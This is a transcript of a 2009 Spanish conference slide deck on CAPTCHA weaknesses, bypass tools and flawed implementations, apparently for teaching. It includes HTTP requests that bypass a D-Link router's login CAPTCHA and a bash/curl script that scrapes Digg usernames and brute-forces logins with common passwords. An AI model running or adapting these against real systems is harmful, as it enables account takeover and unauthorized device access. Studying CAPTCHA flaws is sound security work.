  • 4. • Antes de llevar a cabo una acción se comprueba la condición de Hommer. • Previene que software automático realice: – SPAM: blogs, wikis, foros – Registro masivo de usuarios – Votaciones – Fuerza Bruta de usuarios / contraseñas • Diseño: – Fácil de resolver para el hombre – Difícil de resolver para la máquina – Fácil de generar y evaluar C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 5. Tipos de captcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 6. ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿allant? NO SI C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 7. Evolución EZ-Gimpy + Contraste + Fondo + Fuente no fija + Línea - Fondos + Superposición C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 8. Captchas no resolvibles Accesibilidad http://www.w3.org/TR/turingtest/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 9. Vulnerabilidades • Tipo de letra: – No variable – Sin rotación – Colores fijos – Sin deformación – Sin superposición – Misma posición de caracteres – Misma longitud de caracteres – Reducido código de caracteres • Fondo: – Colores fijos – Sin textura o textura fija C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 10. Diseño seguro • Rotar colores en la fuente y el fondo. • Uso de mayúsculas y minúsculas. • Letras más oscuras y más claras que el fondo. • Uso de escala de colores (gradient). • No alinear los caracteres horizontalmente. • Sobreponer las letras. • No utilizar palabras de diccionario. • Distinta longitud de caracteres. • Dibujar líneas sobre las letras del mismo color. • Amplio código de caracteres. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 11. Métodos para saltar CAPTCHAs • Mediante el uso de OCR / IVR • Explotando la implantación - MoBIC • Usando mano de obra barata C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 12. Cortar, copiar, pintar y colorear A R C 3 I C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 13. Herramientas Disponibles • PWNtcha: http://caca.zoy.org/wiki/PWNtcha • CAP-OCR: http://cap-cap.ru/ • Captcha Breaker: http://churchturing.org/captcha- dist/ • aiCaptcha: http://www.mperfect.net/aiCaptcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 14. PWNtcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 15. Ataques 2008 Google (Jan 17) 20% Hotmail (Feb 6) 30-35% Yahoo (Feb 22) 30-35% C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 16. Software C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 17. jDownloader. jAntiCaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 18. Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 19. Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 20. Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 21. Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 22. Servicios Captcha http://www.lafdc.com/captcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 23. Captchas de Voz •No son efectivos •Más inseguros que los tradicionales de imágenes •Poco difundidos •Pruebas de concepto para Google •IVR (Interactive Voice Response) http://blog.wintercore.com/?p=11 http://vorm.net/captchas C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 24. Resolviendo Captchas a Bajo coste Resolviendo CAPTCHAS Semiautomáticamente C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 25. A mano… C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 27. Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 28. Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 30. Router D-Link 1. Modificación de los DNS del router por malware (pharming) 2. D-Link actualiza firmware añadiendo un CAPTCHA a la autenticación. 3. La implantación es incorrecta, paginas como la que gestiona contraseña WPA, son accedidas sin necesidad de CAPTCHA GET /post_login.xml?hash=c8[…]a&auth_code=02F&auth_id=26 GET / /post_login.xml?hash=c8[…]6a GET / /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 http://www.milw0rm.com/exploits/8696 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 31. Fallos genéricos en Implantaciones • Re-utilizando el ID de sesión para un CAPTCHA conocido • Envío de identificación de CAPTCHA + solución, re-utilización de CAPTCHAs conocidos. • Reiniciando intentos con usuario conocido • Uso de un número reducido de CAPTCHAS (generación de BBDD) • Vulnerable a otros ataques web: XSS, CSRF, etc C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 32. DNI-Pasaporte <td align="center" style="font-size: 30pt; font-family: Courier; color: blue;">T</td> <td align="center" style="font-size: 30pt; font-family: Arial; color: blue;">B</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">I</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">J</td> http://rafavargas.com/2008/05/14/un-candidato-a-peor-captcha-de-la-historia/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 33. Red.Es http://mnm.uib.es/gallir/posts/2007/06/09/1108 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 34. Worlds’s most influential person Revista Time C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 35. Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 36. Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 37. reCaptcha.com •60 millones de captcha resueltos por día •Technorati, meneame, twitter, lastfm.es …. Etc •10 millones de palabras por día C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 38. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 39. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 40. Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 41. Megaupload.com Descarga de Archivo http://wwwq3.megaupload.com/gencap.php?60d8950a074984e0.gif C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 42. Captchanumbers (php class) http://www.lucianobello.com.ar/post/captchas-the-good-the- bad-and-the-ugly/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 43. Digg.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 44. Digg.com •Envío usuario y contraseña mediante un POST •El servidor crea una sesión y devuelve un 302 (redirección) a otra página que comprueba si la sesión es correcta o incorrecta en base al usuario y contraseña •Si la contraseña es válida paso, si no es válida me envía a la página de autenticación con un error y la misma sesión que suma 1 error fallido. •Elimino la sesión (y con ello el contador) y repito el envío de usuario y contraseña, volviendo al punto 1. Por lo que el captcha no aparecerá nunca al no sumar los cuatro intentos. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 45. Digg.com 302 Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos+1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 46. Digg.com 302 Se elimina cookie Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos +1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 47. Digg.com Usuarios demócratas: (nicknames == usernames) for i in `seq 1 1018`; do curl –d "getdpage=$i&id=10&page=3&friends=0" "http://digg.com/politics/Bobama_s_44th_Amer/who” | grep users|sed -e 's|.*href="/users/(.*)">.*|1|g’ done Password “123456” (nadie la usa) for pass in password 123456; do for i in `cat USUARIOSOBAMA`; do echo -n $i:$pass curl -c digg.txt -s -L -D - -d "username=$i&password=$pass&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|incorrect"; done done |tee -a passwd2.digg C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 48. Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 49. Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 50. Conclusiones • Los CAPTCHA son un sistema de eficacia dudable. •El mayor riesgo al que se somete es la mano de obra barata. •Su implantación es compleja y requiere de un análisis profundo. •Un diseño incorrecto puede volver la medida inútil C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
  • 51. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009